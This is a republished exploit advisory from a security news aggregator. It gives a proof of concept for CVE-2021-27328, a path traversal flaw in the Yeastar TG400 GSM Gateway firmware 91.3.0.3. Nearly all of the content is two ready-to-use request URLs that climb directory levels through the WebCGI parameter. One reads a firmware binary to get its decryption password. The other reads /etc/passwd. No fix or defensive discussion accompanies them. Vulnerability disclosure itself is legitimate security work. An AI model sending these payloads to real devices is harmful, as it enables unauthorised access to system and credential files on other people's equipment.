Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on February 27th, 2021 📆 | 5630 Views ⚑

0

Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal ≈ Packet Storm

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3

This is a Proof of Concept for CVE-2021-27328
Example

to get firmware decrypting password

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

to get /etc/paswd

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

Source link

Tagged with:



Leave a Reply